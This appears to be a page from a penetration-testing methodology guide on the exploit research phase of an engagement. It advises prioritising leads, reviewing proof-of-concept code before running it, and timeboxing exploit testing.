Exploit Research
Last updated
Was this helpful?
Last updated
Was this helpful?
This phase is critical and is more difficult that it may seem. You should have a plan when you approach this phase of the engagement. What are you hypotheses? What is your objective? What are the obstacles in your way?
During the Information Gathering phase, you should have created a list of things to try or research. These should be prioritized in a manner where the highest priority one is the one where you believe will produce the most fruit for where you are at and with what you are trying to accomplish.
During this phase you should do a code review on any exploits or POC code that you intend on using. Ideally, you will want to know exactly what the code does before you try to run it. Not only could it be malicious but knowing what the exploit is trying to do could help you avoid working with a script that just flat out may not work.
There will be times where to code may be over your head. When this happens, do your best to understand a high level at least what the exploit is and what is required for it to work.
This phase may go hand in hand with exploit development (modification) and exploit testing. As you are researching potential exploits in a prioritized order, you may want to test exploits that you come across that seem promising. With this in mind, do not spend too long just because it seems promising. Set a timer for 30 min to 1 hour before you move on or at least take a break. It may be helpful to reflect back on what you know, what are you assumptions (hypotheses), what is your evidence, how confident are you, and how can you test them?
After you find a potential exploit, review the exploit code and learn what the exploit is and how it works.
Give yourself a window of time to test it.